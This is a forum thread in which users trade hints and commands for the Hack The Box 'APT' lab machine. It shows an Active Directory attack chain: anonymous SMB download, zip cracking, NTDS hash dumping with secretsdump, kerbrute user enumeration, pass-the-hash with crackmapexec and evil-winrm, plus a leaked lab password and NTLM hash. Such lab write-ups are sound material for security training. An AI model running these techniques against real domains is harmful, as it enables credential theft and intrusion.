TUTORIAL apt.htb
by ARhOmOuTEd - November 02, 2020 at 04:46 PM
#25
(November 20, 2020 at 02:37 PM)Predxtor Wrote:
(November 20, 2020 at 10:22 AM)CyberBandit Wrote:
(November 16, 2020 at 06:13 AM)Predxtor Wrote:
(November 15, 2020 at 07:11 PM)raidmail2020 Wrote:
(November 15, 2020 at 06:34 PM)Predxtor Wrote: heres user lol



evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#[email protected]'



Great! Thanks!



Could you please explain how you found 'henry.vinson_adm' and 'G1#[email protected]' ?



1) get IPV6

2) smbclient connect to it and get backup.zip

3) crack zip with rockyou.txt

4) run secretsdump.py (impacket) on ntds.dlt

5) run kerbrute to find valid users

6) make a list of hashes

7) use crackmapexec -H hashes.txt

@Predxtor thanks for posting these steps, do you mind sharing the kerbrute command used to enum users, I've used the following,

kerbrute_linux_amd64 userenum --dc apt.htb.local -d htb.local usernames.txt however only found (administrator,apt & henry.vinsom).

struggling to find the connection between aine.stafford & henry.vinson (or henry.vinson.adm)

Thanks.

when you get the henry.vinson user, make a list of hashes you got and use crackmapexec, then you can find the creds

use --users , i finded _adm user, but i cant find password ..
#26
(November 16, 2020 at 06:13 AM)Predxtor Wrote:
(November 15, 2020 at 07:11 PM)raidmail2020 Wrote:
(November 15, 2020 at 06:34 PM)Predxtor Wrote: heres user lol

evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#[email protected]'

Great! Thanks!

Could you please explain how you found 'henry.vinson_adm' and 'G1#[email protected]' ?

1) get IPV6
2) smbclient connect to it and get backup.zip
3) crack zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dlt
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt

How did you find find the IPv6 address?
#27
@runos

This is how 

https://airbus-cyber-security.com/the-ox...ntication/
#28
(November 30, 2020 at 08:13 PM)chernakotka Wrote: @runos

This is how 

https://airbus-cyber-security.com/the-ox...ntication/

Thanks. It says this "Only Windows machines with the version 5.6 of DCOM Remote Protocol can be abused. This version occurred in June 2008."

But it also says "Please see below results in Figure 6 of the tool when targeting a Windows 10 Pro version 1909:"

So this technique works on all Windows machines basically?
#29
crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes box.htb resolving to the ipv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.
#30
I dont know, but nice.....
#31
(December 01, 2020 at 08:46 AM)shiggy100 Wrote: crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes box.htb resolving to the ipv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.

Did you figure out how to download the files from backup ? I can list the smb shares with smbclient, but I can't find the correct command to download the files from the backup share
#32
(November 30, 2020 at 09:24 PM)runos Wrote:
(November 30, 2020 at 08:13 PM)chernakotka Wrote: @runos

This is how 

https://airbus-cyber-security.com/the-ox...ntication/

Thanks. It says this "Only Windows machines with the version 5.6 of DCOM Remote Protocol can be abused. This version occurred in June 2008."

But it also says "Please see below results in Figure 6 of the tool when targeting a Windows 10 Pro version 1909:"

So this technique works on all Windows machines basically?

I meant to use the script that is in the article .It will help you find the IPv6 address

(December 01, 2020 at 09:49 AM)runos Wrote:
(December 01, 2020 at 08:46 AM)shiggy100 Wrote: crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes box.htb resolving to the ipv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.

Did you figure out how to download the files from backup ? I can list the smb shares with smbclient, but I can't find the correct command to download the files from the backup share

Just use smbclient

smbclient //apt.htb/backup -U""
#33
(December 01, 2020 at 10:27 AM)chernakotka Wrote:
(November 30, 2020 at 09:24 PM)runos Wrote:
(November 30, 2020 at 08:13 PM)chernakotka Wrote: @runos

This is how 

https://airbus-cyber-security.com/the-ox...ntication/

Thanks. It says this "Only Windows machines with the version 5.6 of DCOM Remote Protocol can be abused. This version occurred in June 2008."

But it also says "Please see below results in Figure 6 of the tool when targeting a Windows 10 Pro version 1909:"

So this technique works on all Windows machines basically?

I meant to use the script that is in the article .It will help you find the IPv6 address

(December 01, 2020 at 09:49 AM)runos Wrote:
(December 01, 2020 at 08:46 AM)shiggy100 Wrote: crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes box.htb resolving to the ipv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.

Did you figure out how to download the files from backup ? I can list the smb shares with smbclient, but I can't find the correct command to download the files from the backup share

Just use smbclient

smbclient //apt.htb/backup -U""

Smart...I forgot to think of /etc/hosts. Now I am trying to bruteforce the usernames with userenum to see which ones are valid. Do I need to change the usernames from format firstname.lastname to flastname? So that the first letter is the firsts in the firstname and then I have the lastname, like it usually is in AD environments?
#34
How would you use evil-winrm if the ports 5985/5986 are closed?

I must be missing something :)
#35
(December 01, 2020 at 01:08 PM)bodiesplus Wrote: How would you use evil-winrm if the ports 5985/5986 are closed?

I must be missing something :)

Run nmap against ipv6 ;)
#36
I did it..

Discovered open port 445/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 135/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 53/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 80/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 593/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 636/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 389/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 88/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 464/tcp on dead:beef::b885:d62a:d679:573f

:)

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB - APT - Full tutorial EddieFlagg 39 9,375 April 18, 2021 at 09:25 PM
Last Post: DinkyDoodle
TUTORIAL APT htb i need help asalam 0 294 April 08, 2021 at 01:16 PM
Last Post: asalam
TUTORIAL HTB - You have been banned by HTB-Bot HDplus 23 3,724 March 27, 2021 at 11:11 PM
Last Post: throwawayzero

 Users browsing this thread: 1 Guest(s)